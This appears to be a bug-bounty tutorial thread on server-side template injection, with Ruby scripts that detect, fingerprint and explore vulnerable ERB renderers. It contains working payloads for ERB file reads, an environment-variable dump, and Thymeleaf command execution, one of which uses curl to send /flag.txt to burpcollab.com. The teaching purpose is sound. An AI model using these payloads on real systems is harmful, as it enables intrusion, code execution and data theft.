HackenProof
Mar 13 · 10 tweets · 4 min read
1/

Vuln: SSTI

Severity: depends on the template engine in use. Some engines only let you evaluate expressions inside a sandbox; others hand you arbitrary code execution on the server.

Server-side template injection occurs when user input is unsafely embedded into a server-side template, allowing users to inject template directives.

#bugbountytips #securitytips #SSTI
2/
Constructing a server-side template injection attack

Detect → Identify → Exploit

• Detect whether the template is vulnerable to injection
• Identify the engine the server uses. There are a huge number of templating languages, each with its own syntax and special characters.
• Develop the exploit from what the server sends back
3/

How you can detect SSTI:
Try fuzzing the template by injecting a sequence of special characters, such as `${{<%[%'"}}%`, and look for errors or characters that disappear from the response.
Vulnerable code: `render('Hello ' + username)`
Request: `vulnerable-website.com/?username=${7*7}`
If the output is `Hello 49`, the server evaluated the expression: your input was parsed as a template directive.
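The detection step above, as an added example that is not part of the original thread: a Ruby ERB renderer with the vulnerable concatenation pattern beside its hardened form, with the thread's polyglot and a `7*7` probe run against both. ERB uses `<%= %>` tags, so the probe is `<%= 7*7 %>` rather than the `${7*7}` shown above; the function and constant names are my own.

```ruby
require 'erb'

# Vulnerable: attacker-controlled text is concatenated INTO the template
# source, so any ERB tags it contains are parsed and executed.
def render_vulnerable(username)
  ERB.new('Hello ' + username).result(binding)
end

# Hardened: the template is a fixed string and the user value is passed in
# as data, so it is only ever printed, never parsed.
def render_safe(username)
  ERB.new('Hello <%= username %>').result_with_hash(username: username)
end

# Step 1: the polyglot from the thread. A vulnerable engine either raises
# (broken syntax) or swallows the characters it recognises as tag
# delimiters; a safe renderer echoes the string back untouched.
POLYGLOT = %q(${{<%[%'"}}%)

def fuzz(renderer)
  renderer.call(POLYGLOT)
rescue StandardError, ScriptError => e # SyntaxError is a ScriptError, not a StandardError
  "ERROR: #{e.class}"
end

# Step 2: an expression whose evaluation is unambiguous. Only a renderer
# that executed our input can turn "7*7" into "49".
PROBE = '<%= 7*7 %>'

def ssti?(renderer)
  out = renderer.call(PROBE)
  out.include?('49') && !out.include?('7*7')
end

if __FILE__ == $0
  [method(:render_vulnerable), method(:render_safe)].each do |r|
    puts "#{r.name}: fuzz=#{fuzz(r).inspect} probe=#{r.call(PROBE).inspect} ssti=#{ssti?(r)}"
  end
end
```

The fuzz result is a signal, not proof: the `<%` vanishing from the echoed polyglot tells you the input reached a parser, while the arithmetic probe is what confirms evaluation. Against a real target, `renderer` would be a function that submits the payload over HTTP and returns the response body.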
4/

Once you have detected the template injection potential, the next step is to identify the template engine.

A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines.

Use this decision tree to identify the engine:
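The decision tree referenced above, as an added example that is not part of the original thread: a Ruby function that walks the commonly published probe sequence (`${7*7}`, then `{{7*7}}`, then the engine-specific follow-ups) and returns its best guess. It extends the tree with one branch of my own for ERB. The "servers" it is run against are constructed stand-ins with canned answers, except the ERB one, which is a real, locally vulnerable renderer; names are mine.

```ruby
require 'erb'

# Walk the decision tree: each probe is only sent when the previous answer
# leads there. `probe` is any callable that takes a payload String and
# returns the response body String (a real target needs an HTTP round trip).
def identify_engine(probe)
  if probe.call('${7*7}').include?('49')
    return :smarty if probe.call('a{*comment*}b').include?('ab')      # Smarty comments vanish
    return :mako   if probe.call('${"z".join("ab")}').include?('zab') # Python str.join
    return :unknown_dollar_syntax
  end
  if probe.call('{{7*7}}').include?('49')
    r = probe.call("{{7*'7'}}")             # number * string: coerce or repeat?
    return :twig   if r.include?('49')      # Twig coerces '7' to a number
    return :jinja2 if r.include?('7777777') # Python repeats the string
    return :unknown_brace_syntax
  end
  # Added branch, not in the published tree: ERB (Ruby) uses <%= %> tags.
  return :erb if probe.call('<%= 7*7 %>').include?('49')
  :not_vulnerable
end

# Constructed stand-ins for remote targets. Each canned table answers only
# the probes above the way that engine would; anything else is echoed back.
def fake_server(responses)
  ->(payload) { responses.fetch(payload, payload) }
end

FAKE_SERVERS = {
  jinja2: fake_server('{{7*7}}' => '49', "{{7*'7'}}" => '7777777'),
  twig:   fake_server('{{7*7}}' => '49', "{{7*'7'}}" => '49'),
  smarty: fake_server('${7*7}' => '$49', 'a{*comment*}b' => 'ab'),
  mako:   fake_server('${7*7}' => '49', '${"z".join("ab")}' => 'zab'),
  # The one real engine here: a locally vulnerable ERB renderer.
  erb:    ->(payload) { ERB.new('Hello ' + payload).result },
  # A page that reflects input without any template evaluation.
  static: ->(payload) { payload },
}

if __FILE__ == $0
  FAKE_SERVERS.each { |name, server| puts "#{name}: #{identify_engine(server)}" }
end
```

The order matters: `${7*7}` is tried before `{{7*7}}` because engines that ignore `${...}` echo it back unchanged, which keeps the first branch from firing. An `:unknown_*` answer means the syntax family is known but the engine is not, so fall back to the docs and error messages.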
5/

Exploit:
Read → Explore → Attack
The first step after finding template injection and identifying the template engine is to read the docs.
Key areas of interest are:
• the sections covering basic syntax
• the 'Security Considerations' section
• lists of built-in methods, functions, filters and variables
6/

For example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows:

```erb
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>
```
7/

Explore:

Explore the environment and try to discover all the objects to which you have access.

Many template engines expose a "self" or "environment" object, which acts like a namespace containing all objects, methods, and attributes that are supported by the engine.
8/

If such an object exists, you can potentially use it to generate a list of objects that are in scope.

For example, in Java templating that evaluates Spring EL (the `T()` type operator, as used by Thymeleaf under Spring), you can sometimes dump the process's environment variables with the following injection:

`${T(java.lang.System).getenv()}`
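The exploration step against an ERB target, as an added example that is not part of the original thread: a handful of payloads that ask the engine what object it runs as, which modules are mixed in, which locals the application injected, and whether `File` is reachable (which the ERB file-read payload in tweet 6 relies on). The renderer reproduces the thread's vulnerable concatenation pattern; the payload labels and function names are my own.

```ruby
require 'erb'

# Target with the vulnerable pattern from the thread: attacker input is
# concatenated into the template source. One legitimate variable is in scope.
def vulnerable_render(user_input)
  ERB.new('Hello ' + user_input).result_with_hash(username: 'alice')
end

# Exploration payloads: each asks the engine what is visible from inside a
# template. The keys are my own labels, not ERB names.
EXPLORE = {
  self_object:    '<%= self.inspect %>',                 # the object templates run as
  self_class:     '<%= self.class %>',
  ancestors:      '<%= self.class.ancestors.inspect %>', # modules mixed in, e.g. Kernel
  locals:         '<%= local_variables.inspect %>',      # what result_with_hash injected
  file_reachable: '<%= Object.const_defined?(:File) %>', # is the file API in scope?
  constants:      '<%= Object.constants.size %>',        # rough size of the reachable namespace
}

# Run every payload through the renderer and strip the static prefix, leaving
# only what the engine evaluated.
def explore(renderer)
  EXPLORE.transform_values { |payload| renderer.call(payload).delete_prefix('Hello ') }
end

if __FILE__ == $0
  explore(method(:vulnerable_render)).each { |label, value| puts "#{label}: #{value}" }
end
```

Seeing `main` with `Kernel` in its ancestors tells you the template runs as a plain top-level Ruby object with no sandbox, so everything the process can load is in reach; the `locals` entry shows the application's own variables, which is where sensitive data such as session or user objects usually turns up.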
9/
Exploit
Now you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing each reachable function for exploitable vulnerabilities.

In this wordlist you can find variables defined in the environments of some engines
10/
Example (Thymeleaf, Spring EL). Thymeleaf's `__${...}__` preprocessing evaluates the inner expression first, so a template like

`<a th:href="@{__${path}__}" th:title="${title}">`

evaluates whatever `path` contains, and an expression placed directly in an attribute executes a command on the server:

`<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>`

The same kind of expression can also be delivered in the URL path:

`http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})`
